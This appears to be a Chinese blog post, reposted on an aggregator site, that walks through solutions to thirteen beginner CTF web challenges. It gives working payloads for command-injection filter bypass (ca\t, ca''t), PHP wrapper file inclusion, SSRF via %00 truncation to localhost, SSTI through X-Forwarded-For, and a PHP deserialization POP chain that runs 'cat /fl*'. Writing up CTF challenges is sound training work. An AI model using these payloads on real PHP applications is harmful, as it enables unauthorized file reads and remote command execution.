nss第四页

news/2024/11/17 22:35:27/文章来源:https://www.cnblogs.com/lcmz/p/18389515

1、[GDOUCTF 2023]EZ WEB
首先这题查看源码可以看到有个目录

访问src

这代码的意思就是,如果访问/super-secret-route-nobody-will-guess 的请求方法为put,那么就输出flag
所以就直接抓包然后改请求就行了

2、[GDOUCTF 2023]泄露的伪装
这题的话,需要扫描目录

访问www.rar,得到一个需要解压的压缩包,将他解压得到一个路径

直接data协议 ?cxk=data://text/plain,ctrl
也可以用php://input

3、[HNCTF 2022 Week1]2048
这题直接将alert这段代码放在控制台上flag就出来了

4、[GDOUCTF 2023]hate eat snake
这题直接撞墙死亡,然后点取消,最后静静等待一分钟,再次按下空格,flag就出来了

5、[UUCTF 2022 新生赛]ez_rce

首先来看题目把,过滤了很多东西,然后的话这题用到的知识点就是利用反引号来讲内容输出
php会将反引号中的内容作为shell命令来执行,并将其输出信息返回·

最后的payload:
?code=print(ca\\t /fffffffffflagafag ); 注意这里是ca\t而不是ca\t因为 \t 会被当作制表符,在前面加个 \ 能够转义他
?code=print(ca''t /fffffffffflagafag );
单引号和 \ 绕过是基本的绕过方式

6、[SWPUCTF 2022 新生赛]ez_ez_php(revenge)
这题直接php为协议
?file=php://filter/read=convert.base64-encode/resource=/flag

7、[LitCTF 2023]这是什么?SQL !注一下 !

8、[NISACTF 2022]checkin
复制下来,用vscode打开

最后的payload
?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6+Flag!%E2%81%A9%E2%81%A6N1SACTF

9、[CISCN 2019华东南]Web11
这题提示了ssti注入,而且题目还有个很可疑的部分,就是xff

然后发现可以在xff执行ssti注入,执行系统命令拿到flag

10、[HNCTF 2022 Week1]easy_html
提示了饼干,所以直接看cookie就好了

然后访问f14g.php

提示要手机号登录,因为手机号是11为,但是前端限制了长度为10,所以直接改长度大于11就好了
然后输入一个11位数的手机号就可以直接拿到flag了

11、[NISACTF 2022]babyupload
查看源码,然后代码审计,最后上传文件,抓包改包的名字为 /flag 就可以拿到flag了

12、[GKCTF 2020]cve版签到
f12查看响应头

发现有个hint,Flag in localhost,思路就是要访问本地

但是题目说只能访问 .ctfhub.com 这里的表示所有,也就是说需要url需要包含.ctfhub.com 第一个点前面可以是任何参数
这里它说flag在localhost,所以说要访问本地127.0.0.1,并且把后面的内容忽视掉,这里就可以用%00截断来做了
知识点:操作系统是由c或者汇编写的,这两种语言在定义字符时,都是以\0(0x00)作为字符串的结尾,当读到\0字符时,就认为读到了一个字符串的结束符号
传入:
?url=http://127.0.0.1%00.ctfhub.com

提示host要以123结尾,所以就是继续改,这里来认识一下一个url的结构,
如:
https://user:pass@www.example.com:8080/folder/page.html
协议:https://
用户信息:user:pass@
域名:www.example.com
端口:8080
路径:/folder/page.html
而host也就是指域名,可以参考下面这张图:

所以最后的payload:?url=http://127.0.0.123%00.ctfhub.com

13、[NISACTF 2022]babyserialize
pop链:
TianXiWei::__wakeup()-->Ilovetxw::__call()-->four::-->__set()-->Ilovetxw::__toString()-->NISA::__invoke()
最后的脚本:
`<?php
class NISA{
public $fun;
public $txw4ever="SYSTEM('cat /fl*');";
}

class TianXiWei{
public $ext;
public $x;
}

class Ilovetxw{
public $huang;
public $su;
}

class four{
public $a="TXW4EVER";
private $fun='abc';
}
$a=new TianXiWei();
$a->ext=new Ilovetxw();
$a->ext->huang=new Four();
$a->ext->huang->a=new Ilovetxw();
$a->ext->huang->a->su=new NISA();
echo urlencode(serialize($a));
`

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/789805.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

信奥赛一本通陈老师解题 1128:图像模糊处理

​【题目描述】给定n行m列的图像各像素点的灰度值,要求用如下方法对其进行模糊化处理: 1.四周最外侧的像素点灰度值不变; 2.中间各像素点新灰度值为该像素点及其上下左右相邻四个像素点原灰度值的平均(舍入到最接近的整数)。【输入】第一行包含两个整数n和m,表示图像包含像…

作业8.26:自我介绍+软工5问

这个作业属于哪个课程 班级链接这个作业要求在哪里 作业要求链接这个作业的目标 掌握 Markdown 基本使用;初步预习教材。介绍我自己 🍁嗨,我是凌枫,运行下面的 Python 代码,您将看到我的自我介绍! class UniversityStudent:def __init__(self, major, hobbies, current_…

037.CI4框架CodeIgniter,使用Model模型绑定数据库表

01、我们创建一个数据库,如下:CREATE TABLE `user` (`id` int(20) NOT NULL AUTO_INCREMENT,`username` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL,`userpassword` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAUL…

分享两个方法分析python打包exe

在Python开发中,常常需要将Python脚本打包成独立的可执行文件,以便在没有Python环境的电脑上运行。你是否曾为此感到困惑,不知道该选择哪种工具来实现这一目标?其实,打包Python脚本并不难,关键在于选择合适的工具。今天,我们将介绍两种常用的Python打包工具:PyInstalle…

VMware虚拟机安装的Ubuntu,桥接方式静态ip,内网可以访问,ping外网不可用

1.环境说明 系统:Ubuntu 24.04 环境:VMware下桥接静态IP设置2.问题:ping www.baidu.com报错 [~] ping www.baidu.com ping: www.baidu.com: Temporary failure in name resolution3.解决办法 (1)利用route -n命…

51nod 1204 Parity

闲话 虽然这题好像找不到原题了,但毋庸置疑地说这的确是并查集的好题。 分析 可以先对奇偶区间进行分析,当这个有偶数个 1 时,区间 \(1-(left-1)\) 一定与 区间 \(1-right\) 的奇偶性相同。如此图 \(3-4\) 为偶区间,根据分析,\(1-2\) 为奇区间。\(1-4\) 也为奇区间。但如果…

【信息收集】网络空间测绘FOFA,查询语法最全使用方法(图文解析)

高级搜索基础类别标记类(Special Label)协议类 (type=service)网站类(type=subdomain)证书类地理位置(Location) 时间类(Last update time)独立IP语法(独立IP系列语法,不可和上面其他语法共用)查询基础语法案例html搜索title标题搜索domain域名搜索host主机名搜索o…

Windows10使用MSYS2和VS2019编译FFmpeg详解

本文详解介绍了在windows10下,使用VS2019社区版编译ffmpeg的环境搭建、编译过程,以及期间遇到的各种问题。1 环境准备 1.1 安装Visual Studio 2019 这个步骤相对比较简单,不再详细说明。 1.2 安装msys2 首先需要安装msys2环境以及相关的编译依赖项, 官方网址为: https://ww…

信奥一本通题南沙陈老师解题 1058:求一元二次方程

【题目描述】【输入】输入一行,包含三个浮点数a,b,ca,b,c(它们之间以一个空格分开),分别表示方程ax2+bx+c=0ax2+bx+c=0的系数。【输出】输出一行,表示方程的解。 若两个实根相等,则输出形式为:“x1=x2=...x1=x2=...”; 若两个实根不等,在满足根小者在前的原则,则输出…

PbootCMS使用Ajax无刷新提交留言及表单

留言表单 <form onsubmit="return submsg(this);">联系人<input type="text" name="contacts" required id="contacts">手 机<input type="text" name="mobile" required id="mobile"&…

从代码到产品,我的IT职业成长之路Do

每个人的职业生涯都是一段充满转折和挑战的旅程,当然每一次职业转型都是一次重新定义自己的机会,从2015年开始,当时我刚踏入IT行业,成为一名Java开发者,后来随着时间的推移,我的职业方向逐渐转向了前端开发者,埋头于代码的世界。最终在2018年找到了属于自己的职业定位—…

PbootCMS默认面包屑导航样式修改及自定义的设置方法

用 Pbootcms 建站,如何修改系统默认面包屑标签样式?面包屑调用:{pboot:position}。自定义参数可用变量调整,如 separator(分隔符,默认为 >>)、separatoricon(分割图标)、indextext(首页文本,默认为“首页”)、indexicon(首页图标)。字体图标指 fontawesome…